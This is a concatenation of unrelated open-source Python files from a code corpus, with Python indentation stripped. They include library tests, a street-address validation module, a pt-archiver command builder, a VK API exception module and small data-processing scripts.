)
for ndim in range(1, LEGATE_MAX_DIM + 1):
tgt_shape = (5,) * ndim
# try various shapes that broadcast to the target shape
shapes = [tgt_shape]
for d in range(len(tgt_shape)):
sh = list(tgt_shape)
sh[d] = 1
shapes.append(tuple(sh))
for choices_shape in shapes:
# make sure the choices are between 0 and 1
np_choices = mk_seq_array(np, choices_shape) % 2
num_choices = mk_seq_array(num, choices_shape) % 2
for rhs1_shape in shapes:
np_rhs1 = np.full(rhs1_shape, 42)
num_rhs1 = num.full(rhs1_shape, 42)
for rhs2_shape in shapes:
# make sure rhs1 and rhs2 have different values
np_rhs2 = np.full(rhs2_shape, 17)
num_rhs2 = num.full(rhs2_shape, 17)
np_res = np.choose(np_choices, (np_rhs1, np_rhs2))
num_res = num.choose(num_choices, (num_rhs1, num_rhs2))
assert np.array_equal(np_res, num_res)
return
if __name__ == "__main__":
test()
|
wrappers/python/tests/ledger/test_build_attrib_request.py
|
absltkaos/indy-sdk
| 636 |
84554
|
import json
import pytest
from indy import ledger, error
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_raw_value():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
raw = '{"endpoint":{"ha":"127.0.0.1:5555"}}'
expected_response = {
"identifier": identifier,
"operation": {
"type": "100",
"dest": destination,
"raw": raw
}
}
response = json.loads(await ledger.build_attrib_request(identifier, destination, None, raw, None))
assert expected_response.items() <= response.items()
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_hash_value():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
xhash = "83d907821df1c87db829e96569a11f6fc2e7880acba5e43d07ab786959e13bd3"
expected_response = {
"identifier": identifier,
"operation": {
"type": "100",
"dest": destination,
"hash": xhash
}
}
response = json.loads(await ledger.build_attrib_request(identifier, destination, xhash, None, None))
assert expected_response.items() <= response.items()
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_enc_value():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
enc = "aa3f41f619aa7e5e6b6d0de555e05331787f9bf9aa672b94b57ab65b9b66c3ea960b18a98e3834b1fc6cebf49f463b81fd6e3181"
expected_response = {
"identifier": identifier,
"operation": {
"type": "100",
"dest": destination,
"enc": enc
}
}
response = json.loads(await ledger.build_attrib_request(identifier, destination, None, None, enc))
assert expected_response.items() <= response.items()
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_missed_attribute():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
with pytest.raises(error.CommonInvalidStructure):
await ledger.build_attrib_request(identifier, destination, None, None, None)
|
nebullvm/optimizers/quantization/utils.py
|
emilecourthoud/nebullvm
| 821 |
84559
|
import warnings
from typing import Tuple, Callable, Any, List
import numpy as np
from nebullvm.base import QuantizationType
from nebullvm.inference_learners.base import BaseInferenceLearner
from nebullvm.measure import compute_relative_difference
def check_precision(
optimized_learner: BaseInferenceLearner,
input_data: List[Tuple[Any, ...]],
base_outputs_list: List[Tuple[Any, ...]],
perf_loss_ths: float,
metric_func: Callable = None,
ys: List = None,
aggregation_func: Callable = np.mean,
) -> bool:
metric_func = metric_func or compute_relative_difference
relative_differences = []
if ys is None:
ys = [None] * len(input_data)
for inputs, base_outputs, y in zip(input_data, base_outputs_list, ys):
opt_outputs = optimized_learner(*inputs)
relative_difference = max(
metric_func(base_output, opt_output, y)
for base_output, opt_output in zip(base_outputs, opt_outputs)
)
relative_differences.append(relative_difference)
relative_difference = aggregation_func(relative_differences)
return relative_difference <= perf_loss_ths
def check_quantization(
quantization_type: QuantizationType, perf_loss_ths: float
):
if quantization_type is None and perf_loss_ths is not None:
raise ValueError(
"When a quantization threshold is given it is necessary to "
"specify the quantization algorithm too."
)
if quantization_type is not None and perf_loss_ths is None:
warnings.warn(
"Got a valid quantization type without any given quantization "
"threshold. The quantization step will be ignored."
)
|
tests/TestLogging.py
|
asukiaaa/cadquery
| 403 |
84568
|
import unittest
import mock
from copy import copy
from tests import BaseTest
import logging
# Units under test
import cadquery
from cadquery.freecad_impl import console_logging
class TestLogging(BaseTest):
def setUp(self):
# save root logger's state
root_logger = logging.getLogger()
self._initial_level = root_logger.level
self._initial_logging_handlers = copy(root_logger.handlers)
def tearDown(self):
# forcefully re-establish original log state
root_logger = logging.getLogger()
root_logger.level = self._initial_level
root_logger.handlers = self._initial_logging_handlers
# reset console_logging's global state
cadquery.freecad_impl.console_logging._logging_handler = None
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleMessage(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.info('foo')
mock_freecad.Console.PrintMessage.assert_called_once_with('foo\n')
mock_freecad.Console.PrintWarning.assert_not_called()
mock_freecad.Console.PrintError.assert_not_called()
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleWarning(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.warning('bar')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_called_once_with('bar\n')
mock_freecad.Console.PrintError.assert_not_called()
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleError(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.error('roo')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_not_called()
mock_freecad.Console.PrintError.assert_called_once_with('roo\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleDebugOffDefault(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.debug('no show')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_not_called()
mock_freecad.Console.PrintError.assert_not_called()
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleSetLevelDebug(self, mock_freecad):
console_logging.enable(level=logging.DEBUG)
log = logging.getLogger('test')
log.debug('now showing')
mock_freecad.Console.PrintMessage.assert_called_once_with('now showing\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleSetLevelWarning(self, mock_freecad):
console_logging.enable(level=logging.WARNING)
log = logging.getLogger('test')
log.info('no show')
log.warning('be warned')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_called_once_with('be warned\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleLogFormat(self, mock_freecad):
console_logging.enable(format=">> %(message)s <<")
log = logging.getLogger('test')
log.info('behold brackets!')
mock_freecad.Console.PrintMessage.assert_called_once_with('>> behold brackets! <<\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleEnableDisable(self, mock_freecad):
console_logging.enable()
console_logging.disable()
log = logging.getLogger('test')
log.error('nope, disabled')
mock_freecad.Console.PrintError.assert_not_called()
|
test/regression/features/integers/unary_minus.py
|
ppelleti/berp
| 137 |
84603
|
<reponame>ppelleti/berp
print(-1)
print(-0)
print(-(6))
print(-(12*2))
print(- -10)
|
src/genie/libs/parser/iosxe/tests/ShowKeyChain/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
| 204 |
84617
|
expected_output = {
"key_chains": {
"bla": {
"keys": {
1: {
"accept_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
"key_string": "cisco123",
"send_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
},
2: {
"accept_lifetime": {
"end": "06:01:00 UTC Jan 1 2010",
"is_valid": False,
"start": "10:10:10 UTC Jan 1 2002",
},
"key_string": "blabla",
"send_lifetime": {
"end": "06:01:00 UTC Jan 1 2010",
"is_valid": False,
"start": "10:10:10 UTC Jan 1 2002",
},
},
},
},
"cisco": {
"keys": {
1: {
"accept_lifetime": {
"end": "infinite",
"is_valid": True,
"start": "11:11:11 UTC Mar 1 2001",
},
"key_string": "cisco123",
"send_lifetime": {
"end": "infinite",
"is_valid": True,
"start": "11:11:11 UTC Mar 1 2001",
},
},
2: {
"accept_lifetime": {
"end": "22:11:11 UTC Dec 20 2030",
"is_valid": True,
"start": "11:22:11 UTC Jan 1 2001",
},
"key_string": "cisco234",
"send_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
},
3: {
"accept_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
"key_string": "cisco",
"send_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
},
},
},
},
}
|
corehq/ex-submodules/phonelog/migrations/0013_delete_olddevicereportentry.py
|
dimagilg/commcare-hq
| 471 |
84701
|
# Generated by Django 1.10.7 on 2017-07-11 12:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('phonelog', '0012_server_date_not_null'),
]
operations = [
migrations.DeleteModel(
name='OldDeviceReportEntry',
),
]
|
i18naddress/__init__.py
|
rsat/google-i18n-address
| 112 |
84702
|
from __future__ import unicode_literals
import io
import json
import os
import re
from collections import OrderedDict
VALID_COUNTRY_CODE = re.compile(r"^\w{2,3}$")
VALIDATION_DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
VALIDATION_DATA_PATH = os.path.join(VALIDATION_DATA_DIR, "%s.json")
FIELD_MAPPING = {
"A": "street_address",
"C": "city",
"D": "city_area",
"N": "name",
"O": "company_name",
"S": "country_area",
"X": "sorting_code",
"Z": "postal_code",
}
KNOWN_FIELDS = set(FIELD_MAPPING.values()) | {"country_code"}
def load_validation_data(country_code="all"):
if not VALID_COUNTRY_CODE.match(country_code):
raise ValueError("%r is not a valid country code" % (country_code,))
country_code = country_code.lower()
try:
# VALIDATION_DATA_PATH may have '%' symbols
# for backwards compatability if VALIDATION_DATA_PATH is imported
# by consumers of this package.
path = VALIDATION_DATA_PATH % (country_code,)
except TypeError:
path = os.path.join(VALIDATION_DATA_DIR, "%s.json" % country_code)
if not os.path.exists(path):
raise ValueError("%r is not a valid country code" % (country_code,))
with io.open(path, encoding="utf-8") as data:
return json.load(data)
class ValidationRules(object):
__slots__ = [
"country_code",
"country_name",
"address_format",
"address_latin_format",
"allowed_fields",
"required_fields",
"upper_fields",
"country_area_type",
"country_area_choices",
"city_type",
"city_choices",
"city_area_type",
"city_area_choices",
"postal_code_type",
"postal_code_matchers",
"postal_code_examples",
"postal_code_prefix",
]
def __init__(
self,
country_code,
country_name,
address_format,
address_latin_format,
allowed_fields,
required_fields,
upper_fields,
country_area_type,
country_area_choices,
city_type,
city_choices,
city_area_type,
city_area_choices,
postal_code_type,
postal_code_matchers,
postal_code_examples,
postal_code_prefix,
):
self.country_code = country_code
self.country_name = country_name
self.address_format = address_format
self.address_latin_format = address_latin_format
self.allowed_fields = allowed_fields
self.required_fields = required_fields
self.upper_fields = upper_fields
self.country_area_type = country_area_type
self.country_area_choices = country_area_choices
self.city_type = city_type
self.city_choices = city_choices
self.city_area_type = city_area_type
self.city_area_choices = city_area_choices
self.postal_code_type = postal_code_type
self.postal_code_matchers = postal_code_matchers
self.postal_code_examples = postal_code_examples
self.postal_code_prefix = postal_code_prefix
def __repr__(self):
return (
"ValidationRules("
"country_code=%r, "
"country_name=%r, "
"address_format=%r, "
"address_latin_format=%r, "
"allowed_fields=%r, "
"required_fields=%r, "
"upper_fields=%r, "
"country_area_type=%r, "
"country_area_choices=%r, "
"city_type=%r, "
"city_choices=%r, "
"city_area_type=%r, "
"city_area_choices=%r, "
"postal_code_type=%r, "
"postal_code_matchers=%r, "
"postal_code_examples=%r, "
"postal_code_prefix=%r)"
% (
self.country_code,
self.country_name,
self.address_format,
self.address_latin_format,
self.allowed_fields,
self.required_fields,
self.upper_fields,
self.country_area_type,
self.country_area_choices,
self.city_type,
self.city_choices,
self.city_area_type,
self.city_area_choices,
self.postal_code_type,
self.postal_code_matchers,
self.postal_code_examples,
self.postal_code_prefix,
)
)
def _make_choices(rules, translated=False):
sub_keys = rules.get("sub_keys")
if not sub_keys:
return []
choices = []
sub_keys = sub_keys.split("~")
sub_names = rules.get("sub_names")
if sub_names:
choices += [
(key, value) for key, value in zip(sub_keys, sub_names.split("~")) if value
]
else:
if not translated:
choices += [(key, key) for key in sub_keys]
if not translated:
sub_lnames = rules.get("sub_lnames")
if sub_lnames:
choices += [
(key, value)
for key, value in zip(sub_keys, sub_lnames.split("~"))
if value
]
sub_lfnames = rules.get("sub_lfnames")
if sub_lfnames:
choices += [
(key, value)
for key, value in zip(sub_keys, sub_lfnames.split("~"))
if value
]
return choices
def _compact_choices(choices):
value_map = OrderedDict()
for key, value in choices:
if not key in value_map:
value_map[key] = set()
value_map[key].add(value)
return [
(key, value) for key, values in value_map.items() for value in sorted(values)
]
def _match_choices(value, choices):
if value:
value = value.strip().lower()
for name, label in choices:
if name.lower() == value:
return name
if label.lower() == value:
return name
def _load_country_data(country_code):
database = load_validation_data("zz")
country_data = database["ZZ"]
if country_code:
country_code = country_code.upper()
if country_code.lower() == "zz":
raise ValueError("%r is not a valid country code" % (country_code,))
database = load_validation_data(country_code.lower())
country_data.update(database[country_code])
return country_data, database
def get_validation_rules(address):
country_code = address.get("country_code", "").upper()
country_data, database = _load_country_data(country_code)
country_name = country_data.get("name", "")
address_format = country_data["fmt"]
address_latin_format = country_data.get("lfmt", address_format)
format_fields = re.finditer(r"%([ACDNOSXZ])", address_format)
allowed_fields = {FIELD_MAPPING[m.group(1)] for m in format_fields}
required_fields = {FIELD_MAPPING[f] for f in country_data["require"]}
upper_fields = {FIELD_MAPPING[f] for f in country_data["upper"]}
languages = [None]
if "languages" in country_data:
languages = country_data["languages"].split("~")
postal_code_matchers = []
if "postal_code" in allowed_fields:
if "zip" in country_data:
postal_code_matchers.append(re.compile("^" + country_data["zip"] + "$"))
postal_code_examples = []
if "zipex" in country_data:
postal_code_examples = country_data["zipex"].split(",")
country_area_choices = []
city_choices = []
city_area_choices = []
country_area_type = country_data["state_name_type"]
city_type = country_data["locality_name_type"]
city_area_type = country_data["sublocality_name_type"]
postal_code_type = country_data["zip_name_type"]
postal_code_prefix = country_data.get("postprefix", "")
# second level of data is for administrative areas
country_area = None
city = None
city_area = None
if country_code in database:
if "sub_keys" in country_data:
for language in languages:
is_default_language = (
language is None or language == country_data["lang"]
)
matched_country_area = None
matched_city = None
if is_default_language:
localized_country_data = database[country_code]
else:
localized_country_data = database[
"%s--%s" % (country_code, language)
]
localized_country_area_choices = _make_choices(localized_country_data)
country_area_choices += localized_country_area_choices
existing_choice = country_area is not None
matched_country_area = country_area = _match_choices(
address.get("country_area"), localized_country_area_choices
)
if matched_country_area:
# third level of data is for cities
if is_default_language:
country_area_data = database[
"%s/%s" % (country_code, country_area)
]
else:
country_area_data = database[
"%s/%s--%s" % (country_code, country_area, language)
]
if not existing_choice:
if "zip" in country_area_data:
postal_code_matchers.append(
re.compile("^" + country_area_data["zip"])
)
if "zipex" in country_area_data:
postal_code_examples = country_area_data["zipex"].split(",")
if "sub_keys" in country_area_data:
localized_city_choices = _make_choices(country_area_data)
city_choices += localized_city_choices
existing_choice = city is not None
matched_city = city = _match_choices(
address.get("city"), localized_city_choices
)
if matched_city:
# fourth level of data is for dependent sublocalities
if is_default_language:
city_data = database[
"%s/%s/%s" % (country_code, country_area, city)
]
else:
city_data = database[
"%s/%s/%s--%s"
% (country_code, country_area, city, language)
]
if not existing_choice:
if "zip" in city_data:
postal_code_matchers.append(
re.compile("^" + city_data["zip"])
)
if "zipex" in city_data:
postal_code_examples = city_data["zipex"].split(",")
if "sub_keys" in city_data:
localized_city_area_choices = _make_choices(city_data)
city_area_choices += localized_city_area_choices
existing_choice = city_area is not None
matched_city_area = city_area = _match_choices(
address.get("city_area"), localized_city_area_choices
)
if matched_city_area:
if is_default_language:
city_area_data = database[
"%s/%s/%s/%s"
% (country_code, country_area, city, city_area)
]
else:
city_area_data = database[
"%s/%s/%s/%s--%s"
% (
country_code,
country_area,
city,
city_area,
language,
)
]
if not existing_choice:
if "zip" in city_area_data:
postal_code_matchers.append(
re.compile("^" + city_area_data["zip"])
)
if "zipex" in city_area_data:
postal_code_examples = city_area_data[
"zipex"
].split(",")
country_area_choices = _compact_choices(country_area_choices)
city_choices = _compact_choices(city_choices)
city_area_choices = _compact_choices(city_area_choices)
return ValidationRules(
country_code,
country_name,
address_format,
address_latin_format,
allowed_fields,
required_fields,
upper_fields,
country_area_type,
country_area_choices,
city_type,
city_choices,
city_area_type,
city_area_choices,
postal_code_type,
postal_code_matchers,
postal_code_examples,
postal_code_prefix,
)
class InvalidAddress(ValueError):
def __init__(self, message, errors):
super(InvalidAddress, self).__init__(message)
self.errors = errors
def _normalize_field(name, rules, data, choices, errors):
value = data.get(name)
if name in rules.upper_fields and value is not None:
value = value.upper()
data[name] = value
if name not in rules.allowed_fields:
data[name] = ""
elif not value and name in rules.required_fields:
errors[name] = "required"
elif choices:
if value or name in rules.required_fields:
value = _match_choices(value, choices)
if value is not None:
data[name] = value
else:
errors[name] = "invalid"
if not value:
data[name] = ""
def normalize_address(address):
errors = {}
try:
rules = get_validation_rules(address)
except ValueError:
errors["country_code"] = "invalid"
else:
cleaned_data = address.copy()
country_code = cleaned_data.get("country_code")
if not country_code:
errors["country_code"] = "required"
else:
cleaned_data["country_code"] = country_code.upper()
_normalize_field(
"country_area", rules, cleaned_data, rules.country_area_choices, errors
)
_normalize_field("city", rules, cleaned_data, rules.city_choices, errors)
_normalize_field(
"city_area", rules, cleaned_data, rules.city_area_choices, errors
)
_normalize_field("postal_code", rules, cleaned_data, [], errors)
postal_code = cleaned_data.get("postal_code", "")
if rules.postal_code_matchers and postal_code:
for matcher in rules.postal_code_matchers:
if not matcher.match(postal_code):
errors["postal_code"] = "invalid"
break
_normalize_field("street_address", rules, cleaned_data, [], errors)
_normalize_field("sorting_code", rules, cleaned_data, [], errors)
if errors:
raise InvalidAddress("Invalid address", errors)
return cleaned_data
def _format_address_line(line_format, address, rules):
def _get_field(name):
value = address.get(name, "")
if name in rules.upper_fields:
value = value.upper()
return value
replacements = {
"%%%s" % code: _get_field(field_name)
for code, field_name in FIELD_MAPPING.items()
}
fields = re.split("(%.)", line_format)
fields = [replacements.get(f, f) for f in fields]
return "".join(fields).strip()
def get_field_order(address, latin=False):
"""
Returns expected order of address form fields as a list of lists.
Example for PL:
>>> get_field_order({'country_code': 'PL'})
[[u'name'], [u'company_name'], [u'street_address'], [u'postal_code', u'city']]
"""
rules = get_validation_rules(address)
address_format = rules.address_latin_format if latin else rules.address_format
address_lines = address_format.split("%n")
replacements = {
"%%%s" % code: field_name for code, field_name in FIELD_MAPPING.items()
}
all_lines = []
for line in address_lines:
fields = re.split("(%.)", line)
single_line = [replacements.get(field) for field in fields]
single_line = list(filter(None, single_line))
all_lines.append(single_line)
return all_lines
def format_address(address, latin=False):
rules = get_validation_rules(address)
address_format = rules.address_latin_format if latin else rules.address_format
address_line_formats = address_format.split("%n")
address_lines = [
_format_address_line(lf, address, rules) for lf in address_line_formats
]
address_lines.append(rules.country_name)
address_lines = filter(None, address_lines)
return "\n".join(address_lines)
def latinize_address(address, normalized=False):
if not normalized:
address = normalize_address(address)
cleaned_data = address.copy()
country_code = address.get("country_code", "").upper()
dummy_country_data, database = _load_country_data(country_code)
if country_code:
country_area = address["country_area"]
if country_area:
key = "%s/%s" % (country_code, country_area)
country_area_data = database.get(key)
if country_area_data:
cleaned_data["country_area"] = country_area_data.get(
"lname", country_area_data.get("name", country_area)
)
city = address["city"]
key = "%s/%s/%s" % (country_code, country_area, city)
city_data = database.get(key)
if city_data:
cleaned_data["city"] = city_data.get(
"lname", city_data.get("name", city)
)
city_area = address["city_area"]
key = "%s/%s/%s/%s" % (country_code, country_area, city, city_area)
city_area_data = database.get(key)
if city_area_data:
cleaned_data["city_area"] = city_area_data.get(
"lname", city_area_data.get("name", city_area)
)
return cleaned_data
|
generate/generate_sentihood_NLI_M.py
|
bubblemans/ABSA-BERT-pair
| 462 |
84722
|
<reponame>bubblemans/ABSA-BERT-pair
import os
from data_utils_sentihood import *
data_dir='../data/sentihood/'
aspect2idx = {
'general': 0,
'price': 1,
'transit-location': 2,
'safety': 3,
}
(train, train_aspect_idx), (val, val_aspect_idx), (test, test_aspect_idx) = load_task(data_dir, aspect2idx)
print("len(train) = ", len(train))
print("len(val) = ", len(val))
print("len(test) = ", len(test))
train.sort(key=lambda x:x[2]+str(x[0])+x[3][0])
val.sort(key=lambda x:x[2]+str(x[0])+x[3][0])
test.sort(key=lambda x:x[2]+str(x[0])+x[3][0])
dir_path = data_dir+'bert-pair/'
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(dir_path+"train_NLI_M.tsv","w",encoding="utf-8") as f:
f.write("id\tsentence1\tsentence2\tlabel\n")
for v in train:
f.write(str(v[0])+"\t")
word=v[1][0].lower()
if word=='location1':f.write('location - 1')
elif word=='location2':f.write('location - 2')
elif word[0]=='\'':f.write("\' "+word[1:])
else:f.write(word)
for i in range(1,len(v[1])):
word=v[1][i].lower()
f.write(" ")
if word == 'location1':
f.write('location - 1')
elif word == 'location2':
f.write('location - 2')
elif word[0] == '\'':
f.write("\' " + word[1:])
else:
f.write(word)
f.write("\t")
if v[2]=='LOCATION1':f.write('location - 1 - ')
if v[2]=='LOCATION2':f.write('location - 2 - ')
if len(v[3])==1:
f.write(v[3][0]+"\t")
else:
f.write("transit location\t")
f.write(v[4]+"\n")
with open(dir_path+"dev_NLI_M.tsv","w",encoding="utf-8") as f:
f.write("id\tsentence1\tsentence2\tlabel\n")
for v in val:
f.write(str(v[0])+"\t")
word=v[1][0].lower()
if word=='location1':f.write('location - 1')
elif word=='location2':f.write('location - 2')
elif word[0]=='\'':f.write("\' "+word[1:])
else:f.write(word)
for i in range(1,len(v[1])):
word=v[1][i].lower()
f.write(" ")
if word == 'location1':
f.write('location - 1')
elif word == 'location2':
f.write('location - 2')
elif word[0] == '\'':
f.write("\' " + word[1:])
else:
f.write(word)
f.write("\t")
if v[2]=='LOCATION1':f.write('location - 1 - ')
if v[2]=='LOCATION2':f.write('location - 2 - ')
if len(v[3])==1:
f.write(v[3][0]+"\t")
else:
f.write("transit location\t")
f.write(v[4]+"\n")
with open(dir_path+"test_NLI_M.tsv","w",encoding="utf-8") as f:
f.write("id\tsentence1\tsentence2\tlabel\n")
for v in test:
f.write(str(v[0])+"\t")
word=v[1][0].lower()
if word=='location1':f.write('location - 1')
elif word=='location2':f.write('location - 2')
elif word[0]=='\'':f.write("\' "+word[1:])
else:f.write(word)
for i in range(1,len(v[1])):
word=v[1][i].lower()
f.write(" ")
if word == 'location1':
f.write('location - 1')
elif word == 'location2':
f.write('location - 2')
elif word[0] == '\'':
f.write("\' " + word[1:])
else:
f.write(word)
f.write("\t")
if v[2]=='LOCATION1':f.write('location - 1 - ')
if v[2]=='LOCATION2':f.write('location - 2 - ')
if len(v[3])==1:
f.write(v[3][0]+"\t")
else:
f.write("transit location\t")
f.write(v[4]+"\n")
|
WebMirror/management/rss_parser_funcs/feed_parse_extractLizonkanovelsWordpressCom.py
|
fake-name/ReadableWebProxy
| 193 |
84748
|
def extractLizonkanovelsWordpressCom(item):
'''
Parser for 'lizonkanovels.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('bestial blade by priest', 'bestial blade', 'translated'),
('creatures of habit by meat in the shell', 'creatures of habit', 'translated'),
('seal cultivation for self-improvement by mo xiao xian', 'seal cultivation for self-improvement', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
ch49-计算摄影学-图像去噪/1-fastNlMeansDenoisingColored.py
|
makelove/OpenCV-Python-Tutorial
| 2,875 |
84760
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
# @Time : 2017/7/13 下午9:56
# @Author : play4fun
# @File : 1-fastNlMeansDenoisingColored.py
# @Software: PyCharm
"""
1-fastNlMeansDenoisingColored.py:
"""
import numpy as np
import cv2
from matplotlib import pyplot as plt
img = cv2.imread('die.png')
img = cv2.cvtColor(img, code=cv2.COLOR_BGR2RGB)
dst = cv2.fastNlMeansDenoisingColored(img, None, 10, 10, 7, 21)
# dst2=cv2.cvtColor(dst,code=cv2.COLOR_BGR2RGB)
plt.subplot(121), plt.imshow(img)
plt.subplot(122), plt.imshow(dst)
# plt.subplot(122), plt.imshow(dst2)
plt.show()
|
pythonforandroid/recipes/vk/vk/exceptions.py
|
alexben16/python-for-android
| 119 |
84772
|
# API Error Codes
AUTHORIZATION_FAILED = 5 # Invalid access token
PERMISSION_IS_DENIED = 7
CAPTCHA_IS_NEEDED = 14
ACCESS_DENIED = 15 # No access to call this method
INVALID_USER_ID = 113 # User deactivated
class VkException(Exception):
pass
class VkAuthError(VkException):
pass
class VkAPIError(VkException):
__slots__ = ['error', 'code', 'message', 'request_params', 'redirect_uri']
CAPTCHA_NEEDED = 14
ACCESS_DENIED = 15
def __init__(self, error_data):
super(VkAPIError, self).__init__()
self.error_data = error_data
self.code = error_data.get('error_code')
self.message = error_data.get('error_msg')
self.request_params = self.get_pretty_request_params(error_data)
self.redirect_uri = error_data.get('redirect_uri')
@staticmethod
def get_pretty_request_params(error_data):
request_params = error_data.get('request_params', ())
request_params = {param['key']: param['value'] for param in request_params}
return request_params
def is_access_token_incorrect(self):
return self.code == self.ACCESS_DENIED and 'access_token' in self.message
def is_captcha_needed(self):
return self.code == self.CAPTCHA_NEEDED
@property
def captcha_sid(self):
return self.error_data.get('captcha_sid')
@property
def captcha_img(self):
return self.error_data.get('captcha_img')
def __str__(self):
error_message = '{self.code}. {self.message}. request_params = {self.request_params}'.format(self=self)
if self.redirect_uri:
error_message += ',\nredirect_uri = "{self.redirect_uri}"'.format(self=self)
return error_message
|
sql/plugins/pt_archiver.py
|
PU-101/Archery
| 3,458 |
84774
|
# -*- coding: UTF-8 -*-
"""
@author: hhyo
@license: Apache Licence
@file: pt_archiver.py
@time: 2020/01/10
"""
from common.config import SysConfig
from sql.plugins.plugin import Plugin
__author__ = 'hhyo'
class PtArchiver(Plugin):
"""
pt-archiver归档数据
"""
def __init__(self):
self.path = 'pt-archiver'
self.required_args = []
self.disable_args = ['analyze']
super(Plugin, self).__init__()
def generate_args2cmd(self, args, shell):
"""
转换请求参数为命令行
:param args:
:param shell:
:return:
"""
k_options = ['no-version-check', 'statistics', 'bulk-insert', 'bulk-delete', 'purge', 'no-delete']
kv_options = ['source', 'dest', 'file', 'where', 'progress', 'charset', 'limit', 'txn-size', 'sleep']
if shell:
cmd_args = self.path if self.path else ''
for name, value in args.items():
if name in k_options and value:
cmd_args += f' --{name}'
elif name in kv_options:
if name == 'where':
cmd_args += f' --{name} "{value}"'
else:
cmd_args += f' --{name} {value}'
else:
cmd_args = [self.path]
for name, value in args.items():
if name in k_options and value:
cmd_args.append(f'--{name}')
elif name in kv_options:
cmd_args.append(f'--{name}')
cmd_args.append(f'{value}')
return cmd_args
|
calculate_paremeter_flop.py
|
Edward1900/Face-Detector-1MB-with-landmark
| 907 |
84777
|
from __future__ import print_function
import os
import argparse
import torch
import torch.backends.cudnn as cudnn
import numpy as np
from data import cfg_mnet, cfg_slim, cfg_rfb
from layers.functions.prior_box import PriorBox
from utils.nms.py_cpu_nms import py_cpu_nms
import cv2
from thop import profile
from thop import clever_format
from models.retinaface import RetinaFace
from models.net_slim import Slim
from models.net_rfb import RFB
from utils.box_utils import decode, decode_landm
from utils.timer import Timer
parser = argparse.ArgumentParser(description='Test')
parser.add_argument('--network', default='mobile0.25', help='Backbone network mobile0.25 or slim or RFB')
parser.add_argument('--long_side', default=320, help='when origin_size is false, long_side is scaled size(320 or 640 for long side)')
args = parser.parse_args()
if __name__ == '__main__':
torch.set_grad_enabled(False)
cfg = None
net = None
if args.network == "mobile0.25":
cfg = cfg_mnet
net = RetinaFace(cfg = cfg, phase = 'test')
elif args.network == "slim":
cfg = cfg_slim
net = Slim(cfg = cfg, phase = 'test')
elif args.network == "RFB":
cfg = cfg_rfb
net = RFB(cfg = cfg, phase = 'test')
else:
print("Don't support network!")
exit(0)
long_side = int(args.long_side)
short_side = int(args.long_side/4*3)
img = torch.randn(1, 3, long_side, short_side)
flops, params = profile(net, inputs=(img, ))
flops, params = clever_format([flops, params], "%.3f")
print("param:", params, "flops:", flops)
|
release/stubs.min/Grasshopper/Kernel/Geometry/ConvexHull.py
|
htlcnn/ironpython-stubs
| 182 |
84794
|
# encoding: utf-8
# module Grasshopper.Kernel.Geometry.ConvexHull calls itself ConvexHull
# from Grasshopper,Version=1.0.0.20,Culture=neutral,PublicKeyToken=dda4f5ec2cd80803
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class Solver(object):
# no doc
@staticmethod
def Compute(nodes,hull):
""" Compute(nodes: Node2List,hull: List[int]) -> bool """
pass
@staticmethod
def ComputeHull(*__args):
"""
ComputeHull(pts: Node2List) -> Polyline
ComputeHull(GH_pts: IEnumerable[GH_Point],plane: Plane) -> (Polyline,Plane)
ComputeHull(GH_pts: IEnumerable[GH_Point]) -> Polyline
"""
pass
|
zulip_botserver/tests/test_server.py
|
dimisjim/python-zulip-api
| 351 |
84827
|
<gh_stars>100-1000
import json
import os
import unittest
from collections import OrderedDict
from importlib import import_module
from pathlib import Path
from types import ModuleType
from typing import Any, Dict
from unittest import mock
from zulip_bots.finder import metadata
from zulip_bots.lib import BotHandler
from zulip_botserver import server
from zulip_botserver.input_parameters import parse_args
from .server_test_lib import BotServerTestCase
